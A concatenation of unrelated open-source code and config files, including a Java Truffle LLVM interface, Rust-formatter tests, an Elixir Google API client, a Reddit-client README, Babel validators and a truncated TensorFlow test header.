/* * Copyright (c) 2017, 2018, Oracle and/or its affiliates. * * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are * permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials provided * with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors may be used to * endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE * GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. */ package com.oracle.truffle.llvm.runtime.nodes.api; import com.oracle.truffle.api.interop.InteropException; public interface LLVMArithmetic { LLVMArithmeticOpNode createAddNode(); LLVMArithmeticOpNode createSubNode(); LLVMArithmeticOpNode createMulNode(); LLVMArithmeticOpNode createDivNode(); LLVMArithmeticOpNode createRemNode(); LLVMArithmeticCompareNode createCmpNode(); abstract class LLVMArithmeticNode extends LLVMNode { public abstract boolean canCompute(Object x, Object y); } abstract class LLVMArithmeticOpNode extends LLVMArithmeticNode { public abstract LLVMArithmetic execute(Object x, Object y) throws InteropException; } abstract class LLVMArithmeticCompareNode extends LLVMArithmeticNode { public abstract int execute(Object x, Object y) throws InteropException; } }
{ "pile_set_name": "Github" }
/* * Use of this source code is governed by the MIT license that can be * found in the LICENSE file. */ package org.rust.ide.formatter class RsStatementSemicolonFormatProcessorTest : RsFormatterTestBase() { // https://internals.rust-lang.org/t/syntax-of-block-like-expressions-in-match-arms/5025 fun `test adds semicolon after return statement`() { doTextTest(""" fn main() { return } fn foo() { return /* comment */ } fn bar() { let mut vector = match iterator.next() { None => return Vec::new(), Some(element) => {} }; } """, """ fn main() { return; } fn foo() { return; /* comment */ } fn bar() { let mut vector = match iterator.next() { None => return Vec::new(), Some(element) => {} }; } """) } fun `test adds semicolon after return statement with value`() { doTextTest(""" fn foo() -> i32 { if true { return 92 } 62 } """, """ fn foo() -> i32 { if true { return 92; } 62 } """) } fun `test adds semicolon after break`() { doTextTest(""" fn foo(cond: bool) { loop { if cond { break } } loop { if cond { break; } } 'label: loop { if cond { break 'label } } } """, """ fn foo(cond: bool) { loop { if cond { break; } } loop { if cond { break; } } 'label: loop { if cond { break 'label; } } } """) } fun `test adds semicolon after continue`() { doTextTest(""" fn foo(cond: bool) { loop { if cond { continue } } loop { if cond { continue; } } 'label: loop { if cond { continue 'label } } } """, """ fn foo(cond: bool) { loop { if cond { continue; } } loop { if cond { continue; } } 'label: loop { if cond { continue 'label; } } } """) } fun `test does not add redundant semicolon`() { val code = """ fn main() { loop { match Some(0) { Some(v) => break Some(v), None => break Some(0) } } } """; checkNotChanged(code) } }
{ "pile_set_name": "Github" }
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # NOTE: This file is auto generated by the elixir code generator program. # Do not edit this file manually. defmodule GoogleApi.DFAReporting.V34.Api.RemarketingLists do @moduledoc """ API calls for all endpoints tagged `RemarketingLists`. """ alias GoogleApi.DFAReporting.V34.Connection alias GoogleApi.Gax.{Request, Response} @library_version Mix.Project.config() |> Keyword.get(:version, "") @doc """ Gets one remarketing list by ID. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. * `id` (*type:* `String.t`) - Remarketing list ID. * `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. * `:alt` (*type:* `String.t`) - Data format for response. * `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. * `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). * `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingList{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_get( Tesla.Env.client(), String.t(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingList.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_get( connection, profile_id, id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query } request = Request.new() |> Request.method(:get) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists/{id}", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1), "id" => URI.encode(id, &(URI.char_unreserved?(&1) || &1 == ?/)) }) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode(opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingList{}]) end @doc """ Inserts a new remarketing list. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. * `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. * `:alt` (*type:* `String.t`) - Data format for response. * `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. * `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). * `:body` (*type:* `GoogleApi.DFAReporting.V34.Model.RemarketingList.t`) - * `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingList{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_insert( Tesla.Env.client(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingList.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_insert( connection, profile_id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query, :body => :body } request = Request.new() |> Request.method(:post) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1) }) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode(opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingList{}]) end @doc """ Retrieves a list of remarketing lists, possibly filtered. This method supports paging. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. * `advertiser_id` (*type:* `String.t`) - Select only remarketing lists owned by this advertiser. * `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. * `:alt` (*type:* `String.t`) - Data format for response. * `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. * `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). * `:active` (*type:* `boolean()`) - Select only active or only inactive remarketing lists. * `:floodlightActivityId` (*type:* `String.t`) - Select only remarketing lists that have this floodlight activity ID. * `:maxResults` (*type:* `integer()`) - Maximum number of results to return. * `:name` (*type:* `String.t`) - Allows searching for objects by name or ID. Wildcards (*) are allowed. For example, "remarketing list*2015" will return objects with names like "remarketing list June 2015", "remarketing list April 2015", or simply "remarketing list 2015". Most of the searches also add wildcards implicitly at the start and the end of the search string. For example, a search string of "remarketing list" will match objects with name "my remarketing list", "remarketing list 2015", or simply "remarketing list". * `:pageToken` (*type:* `String.t`) - Value of the nextPageToken from the previous result page. * `:sortField` (*type:* `String.t`) - Field by which to sort the list. * `:sortOrder` (*type:* `String.t`) - Order of sorted results. * `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingListsListResponse{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_list( Tesla.Env.client(), String.t(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingListsListResponse.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_list( connection, profile_id, advertiser_id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query, :active => :query, :floodlightActivityId => :query, :maxResults => :query, :name => :query, :pageToken => :query, :sortField => :query, :sortOrder => :query } request = Request.new() |> Request.method(:get) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1) }) |> Request.add_param(:query, :advertiserId, advertiser_id) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode( opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingListsListResponse{}] ) end @doc """ Updates an existing remarketing list. This method supports patch semantics. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. * `id` (*type:* `String.t`) - RemarketingList ID. * `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. * `:alt` (*type:* `String.t`) - Data format for response. * `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. * `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). * `:body` (*type:* `GoogleApi.DFAReporting.V34.Model.RemarketingList.t`) - * `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingList{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_patch( Tesla.Env.client(), String.t(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingList.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_patch( connection, profile_id, id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query, :body => :body } request = Request.new() |> Request.method(:patch) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1) }) |> Request.add_param(:query, :id, id) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode(opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingList{}]) end @doc """ Updates an existing remarketing list. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. * `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. * `:alt` (*type:* `String.t`) - Data format for response. * `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. * `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). * `:body` (*type:* `GoogleApi.DFAReporting.V34.Model.RemarketingList.t`) - * `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingList{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_update( Tesla.Env.client(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingList.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_update( connection, profile_id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query, :body => :body } request = Request.new() |> Request.method(:put) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1) }) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode(opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingList{}]) end end
{ "pile_set_name": "Github" }
## ControlEvent **ControlEvent** 专门用于描述 **UI** 控件所产生的事件,它具有以下特征: * 不会产生 `error` 事件 * 一定在 `MainScheduler` 订阅(主线程订阅) * 一定在 `MainScheduler` 监听(主线程监听) * [共享附加作用] [共享附加作用]:/content/recipes/share_side_effects.md
{ "pile_set_name": "Github" }
.hll { background-color: #ffffcc } .c { color: #60a0b0; font-style: italic } /* Comment */ .err { border: 1px solid #FF0000 } /* Error */ .k { color: #007020; font-weight: bold } /* Keyword */ .o { color: #666666 } /* Operator */ .cm { color: #60a0b0; font-style: italic } /* Comment.Multiline */ .cp { color: #007020 } /* Comment.Preproc */ .c1 { color: #60a0b0; font-style: italic } /* Comment.Single */ .cs { color: #60a0b0; background-color: #fff0f0 } /* Comment.Special */ .gd { color: #A00000 } /* Generic.Deleted */ .ge { font-style: italic } /* Generic.Emph */ .gr { color: #FF0000 } /* Generic.Error */ .gh { color: #000080; font-weight: bold } /* Generic.Heading */ .gi { color: #00A000 } /* Generic.Inserted */ .go { color: #888888 } /* Generic.Output */ .gp { color: #c65d09; font-weight: bold } /* Generic.Prompt */ .gs { font-weight: bold } /* Generic.Strong */ .gu { color: #800080; font-weight: bold } /* Generic.Subheading */ .gt { color: #0044DD } /* Generic.Traceback */ .kc { color: #007020; font-weight: bold } /* Keyword.Constant */ .kd { color: #007020; font-weight: bold } /* Keyword.Declaration */ .kn { color: #007020; font-weight: bold } /* Keyword.Namespace */ .kp { color: #007020 } /* Keyword.Pseudo */ .kr { color: #007020; font-weight: bold } /* Keyword.Reserved */ .kt { color: #902000 } /* Keyword.Type */ .m { color: #40a070 } /* Literal.Number */ .s { color: #4070a0 } /* Literal.String */ .na { color: #4070a0 } /* Name.Attribute */ .nb { color: #007020 } /* Name.Builtin */ .nc { color: #0e84b5; font-weight: bold } /* Name.Class */ .no { color: #60add5 } /* Name.Constant */ .nd { color: #555555; font-weight: bold } /* Name.Decorator */ .ni { color: #d55537; font-weight: bold } /* Name.Entity */ .ne { color: #007020 } /* Name.Exception */ .nf { color: #06287e } /* Name.Function */ .nl { color: #002070; font-weight: bold } /* Name.Label */ .nn { color: #0e84b5; font-weight: bold } /* Name.Namespace */ .nt { color: #062873; font-weight: bold } /* Name.Tag */ .nv { color: #bb60d5 } /* Name.Variable */ .ow { color: #007020; font-weight: bold } /* Operator.Word */ .w { color: #bbbbbb } /* Text.Whitespace */ .mf { color: #40a070 } /* Literal.Number.Float */ .mh { color: #40a070 } /* Literal.Number.Hex */ .mi { color: #40a070 } /* Literal.Number.Integer */ .mo { color: #40a070 } /* Literal.Number.Oct */ .sb { color: #4070a0 } /* Literal.String.Backtick */ .sc { color: #4070a0 } /* Literal.String.Char */ .sd { color: #4070a0; font-style: italic } /* Literal.String.Doc */ .s2 { color: #4070a0 } /* Literal.String.Double */ .se { color: #4070a0; font-weight: bold } /* Literal.String.Escape */ .sh { color: #4070a0 } /* Literal.String.Heredoc */ .si { color: #70a0d0; font-style: italic } /* Literal.String.Interpol */ .sx { color: #c65d09 } /* Literal.String.Other */ .sr { color: #235388 } /* Literal.String.Regex */ .s1 { color: #4070a0 } /* Literal.String.Single */ .ss { color: #517918 } /* Literal.String.Symbol */ .bp { color: #007020 } /* Name.Builtin.Pseudo */ .vc { color: #bb60d5 } /* Name.Variable.Class */ .vg { color: #bb60d5 } /* Name.Variable.Global */ .vi { color: #bb60d5 } /* Name.Variable.Instance */ .il { color: #40a070 } /* Literal.Number.Integer.Long */
{ "pile_set_name": "Github" }
console.log('in main.js: ' + JSON.stringify({ __filename: __filename, __dirname: __dirname })); require('./foo');
{ "pile_set_name": "Github" }
# geddit [![GoDoc](https://godoc.org/github.com/jzelinskie/geddit?status.svg)](https://godoc.org/github.com/jzelinskie/geddit) [![Go Report Card](https://goreportcard.com/badge/github.com/jzelinskie/geddit)](https://goreportcard.com/report/github.com/jzelinskie/geddit) [![Build Status](https://api.travis-ci.org/jzelinskie/geddit.svg?branch=master)](https://travis-ci.org/jzelinskie/geddit) Geddit is a convenient abstraction for the [reddit.com](http://reddit.com) API in Go. This library is a WIP. It should have some API coverage, but does not yet include things like the new OAuth model. ## examples See [godoc](http://godoc.org/github.com/jzelinskie/geddit) for OAuth examples. Here is an example usage of the old, cookie authentication method: (NOTE: You will be heavily rate-limited by reddit's API when using cookies. Consider switching to OAuth). ```Go package main import ( "fmt" "github.com/jzelinskie/geddit" ) // Please don't handle errors this way. func main() { // Login to reddit session, _ := geddit.NewLoginSession( "novelty_account", "password", "gedditAgent v1", ) // Set listing options subOpts := geddit.ListingOptions{ Limit: 10, } // Get reddit's default frontpage submissions, _ := session.DefaultFrontpage(geddit.DefaultPopularity, subOpts) // Get our own personal frontpage submissions, _ = session.Frontpage(geddit.DefaultPopularity, subOpts) // Get specific subreddit submissions, sorted by new submissions, _ = session.SubredditSubmissions("hockey", geddit.NewSubmissions, subOpts) // Print title and author of each submission for _, s := range submissions { fmt.Printf("Title: %s\nAuthor: %s\n\n", s.Title, s.Author) } // Upvote the first post session.Vote(submissions[0], geddit.UpVote) } ```
{ "pile_set_name": "Github" }
43.591170 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 1.000000 43.694790 -0.005723 -0.022968 0.979358 -0.000330 -0.001476 -0.000042 0.999999 43.798460 -0.014220 -0.043659 1.958587 -0.001184 -0.002956 0.000123 0.999995
{ "pile_set_name": "Github" }
apiVersion: "config.istio.io/v1alpha2" kind: handler metadata: name: stdio namespace: default labels: app: mixer chart: mixer heritage: Tiller release: istio spec: compiledAdapter: stdio params: outputAsJson: true
{ "pile_set_name": "Github" }
import torch.nn as nn import numpy as np from sever.utils import setup_logger class BaseModel(nn.Module): """ Base class for all models """ def __init__(self, verbose=0): super().__init__() self.logger = setup_logger(self, verbose=verbose) def forward(self, *input): """ Forward pass logic :return: Model output """ raise NotImplementedError def __str__(self): """ Model prints with number of trainable parameters """ model_parameters = filter(lambda p: p.requires_grad, self.parameters()) params = sum([np.prod(p.size()) for p in model_parameters]) return super().__str__() + f'\nTrainable parameters: {params}'
{ "pile_set_name": "Github" }
/* Copyright (c) 2003-2017, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.md or http://ckeditor.com/license */ CKEDITOR.plugins.setLang( 'liststyle', 'cs', { armenian: 'Arménské', bulletedTitle: 'Vlastnosti odrážek', circle: 'Kroužky', decimal: 'Arabská čísla (1, 2, 3, atd.)', decimalLeadingZero: 'Arabská čísla uvozená nulou (01, 02, 03, atd.)', disc: 'Kolečka', georgian: 'Gruzínské (an, ban, gan, atd.)', lowerAlpha: 'Malá latinka (a, b, c, d, e, atd.)', lowerGreek: 'Malé řecké (alpha, beta, gamma, atd.)', lowerRoman: 'Malé římské (i, ii, iii, iv, v, atd.)', none: 'Nic', notset: '<nenastaveno>', numberedTitle: 'Vlastnosti číslování', square: 'Čtverce', start: 'Počátek', type: 'Typ', upperAlpha: 'Velká latinka (A, B, C, D, E, atd.)', upperRoman: 'Velké římské (I, II, III, IV, V, atd.)', validateStartNumber: 'Číslování musí začínat celým číslem.' } );
{ "pile_set_name": "Github" }
"use strict"; var _getIterator = require("babel-runtime/core-js/get-iterator")["default"]; var _interopRequireDefault = require("babel-runtime/helpers/interop-require-default")["default"]; var _interopRequireWildcard = require("babel-runtime/helpers/interop-require-wildcard")["default"]; exports.__esModule = true; exports.isBinding = isBinding; exports.isReferenced = isReferenced; exports.isValidIdentifier = isValidIdentifier; exports.isLet = isLet; exports.isBlockScoped = isBlockScoped; exports.isVar = isVar; exports.isSpecifierDefault = isSpecifierDefault; exports.isScope = isScope; exports.isImmutable = isImmutable; var _retrievers = require("./retrievers"); var _esutils = require("esutils"); var _esutils2 = _interopRequireDefault(_esutils); var _index = require("./index"); var t = _interopRequireWildcard(_index); var _constants = require("./constants"); /** * Check if the input `node` is a binding identifier. */ function isBinding(node /*: Object*/, parent /*: Object*/) /*: boolean*/ { var keys = _retrievers.getBindingIdentifiers.keys[parent.type]; if (keys) { for (var i = 0; i < keys.length; i++) { var key = keys[i]; var val = parent[key]; if (Array.isArray(val)) { if (val.indexOf(node) >= 0) return true; } else { if (val === node) return true; } } } return false; } /** * Check if the input `node` is a reference to a bound variable. */ function isReferenced(node /*: Object*/, parent /*: Object*/) /*: boolean*/ { switch (parent.type) { // yes: PARENT[NODE] // yes: NODE.child // no: parent.NODE case "MemberExpression": case "JSXMemberExpression": case "BindExpression": if (parent.property === node && parent.computed) { return true; } else if (parent.object === node) { return true; } else { return false; } // no: new.NODE // no: NODE.target case "MetaProperty": return false; // yes: { [NODE]: "" } // yes: { NODE } // no: { NODE: "" } case "ObjectProperty": if (parent.key === node) { return parent.computed; } // no: let NODE = init; // yes: let id = NODE; case "VariableDeclarator": return parent.id !== node; // no: function NODE() {} // no: function foo(NODE) {} case "ArrowFunctionExpression": case "FunctionDeclaration": case "FunctionExpression": for (var _iterator = (parent.params /*: Array*/), _isArray = Array.isArray(_iterator), _i = 0, _iterator = _isArray ? _iterator : _getIterator(_iterator);;) { var _ref; if (_isArray) { if (_i >= _iterator.length) break; _ref = _iterator[_i++]; } else { _i = _iterator.next(); if (_i.done) break; _ref = _i.value; } var param = _ref; if (param === node) return false; } return parent.id !== node; // no: export { foo as NODE }; // yes: export { NODE as foo }; // no: export { NODE as foo } from "foo"; case "ExportSpecifier": if (parent.source) { return false; } else { return parent.local === node; } // no: export NODE from "foo"; // no: export * as NODE from "foo"; case "ExportNamespaceSpecifier": case "ExportDefaultSpecifier": return false; // no: <div NODE="foo" /> case "JSXAttribute": return parent.name !== node; // no: class { NODE = value; } // yes: class { key = NODE; } case "ClassProperty": return parent.value === node; // no: import NODE from "foo"; // no: import * as NODE from "foo"; // no: import { NODE as foo } from "foo"; // no: import { foo as NODE } from "foo"; // no: import NODE from "bar"; case "ImportDefaultSpecifier": case "ImportNamespaceSpecifier": case "ImportSpecifier": return false; // no: class NODE {} case "ClassDeclaration": case "ClassExpression": return parent.id !== node; // yes: class { [NODE](){} } case "ClassMethod": case "ObjectMethod": return parent.key === node && parent.computed; // no: NODE: for (;;) {} case "LabeledStatement": return false; // no: try {} catch (NODE) {} case "CatchClause": return parent.param !== node; // no: function foo(...NODE) {} case "RestElement": return false; // yes: left = NODE; // no: NODE = right; case "AssignmentExpression": return parent.right === node; // no: [NODE = foo] = []; // yes: [foo = NODE] = []; case "AssignmentPattern": return parent.right === node; // no: [NODE] = []; // no: ({ NODE }) = []; case "ObjectPattern": case "ArrayPattern": return false; } return true; } /** * Check if the input `name` is a valid identifier name * and isn't a reserved word. */ function isValidIdentifier(name /*: string*/) /*: boolean*/ { if (typeof name !== "string" || _esutils2["default"].keyword.isReservedWordES6(name, true)) { return false; } else { return _esutils2["default"].keyword.isIdentifierNameES6(name); } } /** * Check if the input `node` is a `let` variable declaration. */ function isLet(node /*: Object*/) /*: boolean*/ { return t.isVariableDeclaration(node) && (node.kind !== "var" || node[_constants.BLOCK_SCOPED_SYMBOL]); } /** * Check if the input `node` is block scoped. */ function isBlockScoped(node /*: Object*/) /*: boolean*/ { return t.isFunctionDeclaration(node) || t.isClassDeclaration(node) || t.isLet(node); } /** * Check if the input `node` is a variable declaration. */ function isVar(node /*: Object*/) /*: boolean*/ { return t.isVariableDeclaration(node, { kind: "var" }) && !node[_constants.BLOCK_SCOPED_SYMBOL]; } /** * Check if the input `specifier` is a `default` import or export. */ function isSpecifierDefault(specifier /*: Object*/) /*: boolean*/ { return t.isImportDefaultSpecifier(specifier) || t.isIdentifier(specifier.imported || specifier.exported, { name: "default" }); } /** * Check if the input `node` is a scope. */ function isScope(node /*: Object*/, parent /*: Object*/) /*: boolean*/ { if (t.isBlockStatement(node) && t.isFunction(parent, { body: node })) { return false; } return t.isScopable(node); } /** * Check if the input `node` is definitely immutable. */ function isImmutable(node /*: Object*/) /*: boolean*/ { if (t.isType(node.type, "Immutable")) return true; if (t.isIdentifier(node)) { if (node.name === "undefined") { // immutable! return true; } else { // no idea... return false; } } return false; }
{ "pile_set_name": "Github" }
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for TPUClusterResolver.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import six from six.moves.urllib.error import URLError from tensorflow.python import framework from tensorflow.python.client import session from tensorflow.python.distribute.cluster_resolver.tpu import tpu_cluster_resolver as resolver from tensorflow.python.eager.context import LogicalDevice from tensorflow.python.framework import errors from tensorflow.python.framework import test_util from tensorflow.python.platform import test from tensorflow.python.platform import tf_logging as logging from tensorflow.python.training import server_lib from tensorflow.python.util import 